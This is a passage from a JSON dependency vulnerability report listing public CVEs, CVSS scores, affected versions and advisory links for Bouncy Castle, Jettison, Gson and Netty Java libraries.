wild card characters."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.49|<=1.70"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/08/msg00000.html"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33201"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33201"},{"summary":"NetApp Advisory ntap-20230824-0008","url":"https://security.netapp.com/advisory/ntap-20230824-0008"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.49|<=1.70"]}],"title":"CVE-2023-33201/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-33202"]}],"cve":"CVE-2023-33202","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-11-23T18:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2023-33202"},{"system_name":"NetApp Advisory","text":"ntap-20240125-0001"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bouncy Castle Denial of Service (DoS)"},{"category":"details","details":"Vulnerability Details","text":"# Bouncy Castle Denial of Service (DoS) Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.70"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.73"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33202"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33202"},{"summary":"NetApp Advisory ntap-20240125-0001","url":"https://security.netapp.com/advisory/ntap-20240125-0001"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.70"]}],"title":"CVE-2023-33202/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40149"]}],"cve":"CVE-2022-40149","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-17T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-40149"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"Jettison parser crash by stackoverflow"},{"category":"details","details":"Vulnerability Details","text":"# Jettison parser crash by stackoverflow Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.0"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40149"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40149"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.0"]}],"title":"CVE-2022-40149/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45685"]}],"cve":"CVE-2022-45685","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2022-12-13T15:30:26","ids":[{"system_name":"CVE Record","text":"CVE-2022-45685"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Jettison Out-of-bounds Write vulnerability A stack overflow in Jettison before v1.5.2 allows attackers to cause a Denial of Service (DoS) via crafted JSON data."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45685"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45685"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-45685/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45693"]}],"cve":"CVE-2022-45693","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2022-12-13T15:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-45693"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Jettison Out-of-bounds Write vulnerability Jettison before v1.5.2 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45693"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45693"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-45693/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-1436"]}],"cve":"CVE-2023-1436","cwe":{"id":"674","name":"Uncontrolled Recursion"},"discovery_date":"2023-03-22T06:30:21","ids":[{"system_name":"CVE Record","text":"CVE-2023-1436"},{"system_name":"JFrog Advisory","text":"jettison-json-array-dos-xray-427911"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison vulnerable to infinite recursion"},{"category":"details","details":"Vulnerability Details","text":"# Jettison vulnerable to infinite recursion An infinite recursion is triggered in Jettison when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. This leads to a StackOverflowError exception being thrown."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.3"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1436"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1436"},{"summary":"JFrog Advisory jettison-json-array-dos-xray-427911","url":"https://research.jfrog.com/vulnerabilities/jettison-json-array-dos-xray-427911"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.3"]}],"title":"CVE-2023-1436/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40150"]}],"cve":"CVE-2022-40150","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-09-17T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-40150"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Recursion","title":"Additional CWE: 674"},{"category":"description","details":"Vulnerability Description","text":"Jettison memory exhaustion"},{"category":"details","details":"Vulnerability Details","text":"# Jettison memory exhaustion Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by Out of memory. This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40150"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40150"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-40150/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-25647"]}],"cve":"CVE-2022-25647","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2022-05-03T00:00:44","ids":[{"system_name":"CVE Record","text":"CVE-2022-25647"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMGOOGLECODEGSON-1730327"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5227"},{"system_name":"NetApp Advisory","text":"ntap-20220901-0009"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in Gson"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in Gson The package `com.google.code.gson:gson` before 2.8.9 is vulnerable to Deserialization of Untrusted Data via the `writeReplace()` method in internal classes, which may lead to denial of service attacks.  ## Related CVE(s) CVE-2022-25647, SNYK-JAVA-COMGOOGLECODEGSON-1730327"}],"product_status":{"known_affected":["com.google.code.gson/gson@vers:maven/>=1.1|<=2.8.8"],"known_not_affected":["com.google.code.gson/gson@2.8.9"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00015.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/09/msg00009.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25647"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25647"},{"summary":"NetApp Advisory ntap-20220901-0009","url":"https://security.netapp.com/advisory/ntap-20220901-0009"},{"summary":"Snyk Advisory SNYK-JAVA-COMGOOGLECODEGSON-1730327","url":"https://snyk.io/vuln/SNYK-JAVA-COMGOOGLECODEGSON-1730327"},{"summary":"Debian Advisory dsa-5227","url":"https://www.debian.org/security/2022/dsa-5227"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.7,"baseSeverity":"HIGH","confidentialityImpact":"LOW","environmentalScore":7.7,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.7,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H","version":"3.1"},"products":["com.google.code.gson/gson@vers:maven/>=1.1|<=2.8.8"]}],"title":"CVE-2022-25647/pkg:maven/com.google.code.gson/gson@2.8.0?type=jar"},{"acknowledgements":[{"organization":"Mitre"}],"cve":"CVE-2021-21290","cwe":{"id":"378","name":"Creation of Temporary File With Insecure Permissions"},"discovery_date":"2022-05-10T08:46:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-24823"},{"system_name":"GitHub Advisory","text":"GHSA-269q-hmxg-m83q"},{"system_name":"GitHub Advisory","text":"GHSA-5mcr-gq6c-3hq2"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220616-0004"}],"notes":[{"audience":"developers","category":"other","text":"Creation of Temporary File in Directory with Insecure Permissions","title":"Additional CWE: 379"},{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"Local Information Disclosure Vulnerability in io.netty:netty-codec-http"},{"category":"details","details":"Vulnerability Details","text":"# Local Information Disclosure Vulnerability in io.netty:netty-codec-http ### Description ### [GHSA-5mcr-gq6c-3hq2](https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2) (CVE-2021-21290) contains an insufficient fix for the vulnerability identified.  ### Impact ###  When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled.  This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.  ### Vulnerability Details ###  To fix the vulnerability the code was changed to the following:  ```java   @SuppressJava6Requirement(reason = \"Guarded by version check\")   public static File createTempFile(String prefix, String suffix, File directory) throws IOException {     if (javaVersion() >= 7) {       if (directory == null) {         return Files.createTempFile(prefix, suffix).toFile();       }       return Files.createTempFile(directory.toPath(), prefix, suffix).toFile();     }     if (directory == null) {       return File.createTempFile(prefix, suffix);     }     File file = File.createTempFile(prefix, suffix, directory);     // Try to adjust the perms, if this fails there is not much else we can do...     file.setReadable(false, false);     file.setReadable(true, true);     return file;   } ```  Unfortunately, this logic path was left vulnerable:  ```java     if (directory == null) {       return File.createTempFile(prefix, suffix);     } ```  This file is still readable by all local users.  ### Patches ###  Update to 4.1.77.Final  ### Workarounds ###  Specify your own `java.io.tmpdir` when you start the JVM or use `DefaultHttpDataFactory.setBaseDir(...)` to set the directory to something that is only readable by the current user or update to Java 7 or above.  ### References ###   - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)  - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html)   ### For more information ###  If you have any questions or comments about this advisory:  Open an issue in [netty](https://github.com/netty/netty)   ## Related CVE(s) CVE-2021-21290, CVE-2022-24823, GHSA-5mcr-gq6c-3hq2"}],"product_status":{"known_affected":["io.netty/netty-codec-http@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]},"references":[{"summary":"GitHub Advisory GHSA-269q-hmxg-m83q","url":"https://github.com/netty/netty/security/advisories/GHSA-269q-hmxg-m83q"},{"summary":"GitHub Advisory GHSA-5mcr-gq6c-3hq2","url":"https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24823"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24823"},{"summary":"NetApp Advisory ntap-20220616-0004","url":"https://security.netapp.com/advisory/ntap-20220616-0004"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["io.netty/netty-codec-http@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]}],"title":"CVE-2021-21290/pkg:maven/io.netty/netty-codec-http@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-43797"]}],"cve":"CVE-2021-43797","cwe":{"id":"444","name":"Inconsistent Interpretation of HTTP Requests"},"discovery_date":"2021-12-09T19:09:17","ids":[{"system_name":"CVE Record","text":"CVE-2021-43797"},{"system_name":"GitHub Advisory","text":"GHSA-wx5j-54mm-rqqq"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220107-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"HTTP request smuggling in netty"},{"category":"details","details":"Vulnerability Details","text":"# HTTP request smuggling in netty ### Impact  Netty currently just skips control chars when these are present at the beginning / end of the header name. We should better fail fast as these are not allowed by the spec and could lead to HTTP request smuggling.  Failing to do the validation might cause netty to \"sanitize\" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore and so not do the validation itself."}],"product_status":{"known_affected":["io.netty/netty-codec-http@vers:maven/>=4.0.0|<4.1.71.Final"],"known_not_affected":["io.netty/netty-codec-http@4.1.71.Final"]},"references":[{"summary":"GitHub Advisory GHSA-wx5j-54mm-rqqq","url":"https://github.com/netty/netty/security/advisories/GHSA-wx5j-54mm-rqqq"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-43797"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-43797"},{"summary":"NetApp Advisory ntap-20220107-0003","url":"https://security.netapp.com/advisory/ntap-20220107-0003"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N","version":"3.1"},"products":["io.netty/netty-codec-http@vers:maven/>=4.0.0|<4.1.71.Final"]}],"title":"CVE-2021-43797/pkg:maven/io.netty/netty-codec-http@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37137"]}],"cve":"CVE-2021-37137","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2021-09-09T17:11:31","ids":[{"system_name":"CVE Record","text":"CVE-2021-37137"},{"system_name":"GitHub Advisory","text":"GHSA-9vjp-v76f-g363"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0012"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"\\tSnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way"},{"category":"details","details":"Vulnerability Details","text":"# SnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way ### Impact The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well.  This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.  ### Impact  All users of SnappyFrameDecoder are affected and so the application may be in risk for a DoS attach due excessive memory usage.  ### References https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185"}],"product_status":{"known_affected":["io.netty/netty-codec@vers:maven/>=4.0.0|<4.1.68.Final"],"known_not_affected":["io.netty/netty-codec@4.1.68.Final"]},"references":[{"summary":"GitHub Advisory GHSA-9vjp-v76f-g363","url":"https://github.com/netty/netty/security/advisories/GHSA-9vjp-v76f-g363"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37137"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37137"},{"summary":"NetApp Advisory ntap-20220210-0012","url":"https://security.netapp.com/advisory/ntap-20220210-0012"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory 